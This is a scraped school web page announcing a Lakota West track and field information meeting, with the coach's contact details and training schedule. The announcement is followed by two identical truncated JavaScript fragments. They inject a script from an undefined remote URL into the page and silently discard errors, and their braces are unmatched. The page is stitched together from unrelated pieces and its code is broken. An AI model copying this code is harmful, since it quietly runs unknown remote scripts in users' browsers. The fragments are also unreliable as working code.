Track
Mark Your Calendars: Lakota West Track and Field Information Meeting!
There will be a Track & Field Informational Meeting on Wednesday, January 27th at 5:30pm at Main Campus in the cafeteria. Stop by Coach E’s room at Lakota West in Rm. 250 if you’re unable to attend the meeting or currently involved in a winter sport. Please contact Coach Eisenhard at brenton.eisenhard@lakotaonline.com for any additional information.
Training/Lifting is currently taking place on Tuesdays and Thursdays 3:00-4:45.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();